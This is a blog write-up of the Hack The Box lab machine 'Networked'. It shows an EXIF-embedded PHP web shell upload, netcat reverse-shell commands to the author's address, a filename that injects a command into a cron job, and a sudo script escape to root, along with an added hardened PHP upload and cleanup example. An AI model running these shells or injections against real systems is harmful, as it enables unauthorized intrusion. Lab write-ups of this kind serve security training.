HTB: Networked write-up
I was browsing Hack The Box today and decided to tackle a new box. The one I saw was Networked; it’s made by Guly and looks like a fairly easy box, so let’s get exploiting!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-9.png)
The machine lives on 10.10.10.146. A quick nmap scan shows ports 22 and 80 are open, so we know the initial foothold will come from the web.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-10-1024x213.png)
The initial page is just some text, so let’s run dirbuster on it! After a quick scan, we see there’s a public /uploads/ directory and a /backup/ directory.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-11.png)
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-12-1024x407.png)
Awesome! We’ve got a backup of the source code, so let’s download and inspect it. The source ships with index.php, lib.php, photos.php and upload.php. I think we’re most interested in the upload part and the photos part, so let’s check those out.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-13.png)
After an initial review, it looks like the app just takes the uploaded file, renames it after the user’s IP address, and saves it to /var/www/html/uploads/. The only checks it does are on the MIME type and the file extension. Now, there are two ways we can crack at this: the first is uploading a common PHP shell and setting the file name to something like notashell.php%00.jpg, but let’s try harder and actually embed the shell in an image comment with exiftool!
I start off by downloading a photo of the CentOS logo, and then run exiftool on it. Here’s how it looks:
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-14.png)
We now have an embedded shell inside the photo, let’s upload this picture!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-15.png)
We’re told to refresh the gallery, and upon refresh we see the picture. Let’s go to its direct link.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-16-1024x265.png)
Our shell takes its command from the ?c=$command parameter, so let’s have it open a reverse shell to our local box. Add the argument ?c=nc 10.10.14.128 9983 -e /bin/bash and load the page. The request will hang for as long as you keep the tty open.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-17.png)
We got our initial apache/www-data shell! A quick check of /home/ shows us a user, guly, along with a crontab file and a check_attack.php. This might be interesting.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-18.png)
The crontab.guly runs every 3rd minute, and check_attack.php looks for files in the uploads directory that aren’t named like ip.extension. We can leverage this, because it also doesn’t bother to escape the filename before passing it to the shell, bingo!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-19.png)
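For the defensive side of the two weaknesses used so far (the upload that trusts the MIME type and keeps EXIF data, and the cron cleanup that hands filenames to a shell), here is an added example of how the same two jobs look when hardened. This is not the box’s own upload.php or check_attack.php; the function names, the ip-with-underscores naming convention and the jpg/png allow-list are my assumptions.

```php
<?php
// Added example, not the box's source. Hardened versions of the upload
// step and the cron cleanup step described in the write-up.

// 1. Re-encode the upload with GD. getimagesize() reads the real image
//    header rather than the client-supplied MIME type, and imagejpeg()/
//    imagepng() write fresh pixel data only, so an EXIF comment holding
//    PHP never reaches the web root.
function store_image(string $tmpPath, string $destDir, string $clientIp): ?string {
    $info = @getimagesize($tmpPath);
    if ($info === false) {
        return null;
    }
    switch ($info[2]) {
        case IMAGETYPE_JPEG: $img = @imagecreatefromjpeg($tmpPath); $ext = 'jpg'; break;
        case IMAGETYPE_PNG:  $img = @imagecreatefrompng($tmpPath);  $ext = 'png'; break;
        default:             return null;   // tight allow-list, nothing else is stored
    }
    if ($img === false) {
        return null;
    }
    // The stored name is built server-side; the client's filename is ignored.
    // Assumed convention: 10.10.14.128 -> 10_10_14_128.jpg
    $name = str_replace('.', '_', $clientIp) . '.' . $ext;
    $dest = $destDir . '/' . $name;
    $ok = ($ext === 'jpg') ? imagejpeg($img, $dest, 85) : imagepng($img, $dest);
    imagedestroy($img);
    return $ok ? $name : null;
}

// 2. Cleanup without a shell: decide with a strict pattern, act with unlink().
//    Because no exec()/system() call is made, a crafted filename such as
//    "; nc ..." is just an odd filename that gets deleted.
function is_expected_name(string $name): bool {
    return (bool) preg_match('/\A\d{1,3}(_\d{1,3}){3}\.(jpg|png)\z/', $name);
}

function remove_unexpected(string $dir): array {
    $removed = [];
    foreach (scandir($dir) as $f) {
        if ($f === '.' || $f === '..') {
            continue;
        }
        if (!is_expected_name($f) && unlink($dir . '/' . $f)) {
            $removed[] = $f;
        }
    }
    return $removed;   // names that were deleted, for logging by the caller
}
```

With this shape, the EXIF-comment upload from earlier never lands as PHP, and the cron job has no shell for a filename to break out of.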
So, we need to spawn a shell. We’ve got nc on the box, so let’s force a shell open. Go into /var/www/html/uploads/ and run: touch "; nc 10.10.$IP $PORT -c bash" to open a shell on the 3rd minute, then wait for the back connection.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-20.png)
Bingo, we have a shell! Let’s spawn a proper pty session with python:
python -c 'import pty; pty.spawn("/bin/bash")'
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-21.png)
Now we’ve got our full and proper shell! Let’s grab the user flag with cat /home/guly/user.txt!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-23.png)
Perfect, we’ve got the flag! Let’s head for root. After doing a few of these boxes, I’ve found that a good place to start is sudo -l, so let’s run that:
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-24.png)
Perfect, I got lucky this time. We can run /usr/local/sbin/changename.sh with sudo, and it accepts a limited range of user-controlled input! We should be able to bypass this!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-25.png)
Now, we have two ways to attack this. The first is to copy the /root/ directory into guly’s home and chown it so we can read it. The second is to just spawn a bash shell. Let’s start by copying the /root/ directory out.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-26.png)
Perfect, our escape worked! Let’s check the /home/guly/ directory!
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-27.png)
We got our root flag! But we could’ve done the same escape with test\ bash as the input, so let’s try it.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-28.png)
Hello, root! That’s another way in to the root flag.
![](https://thegeekbin.com/content/images/wordpress/2019/09/image-29.png)
That’s all for this box, we can consider it owned.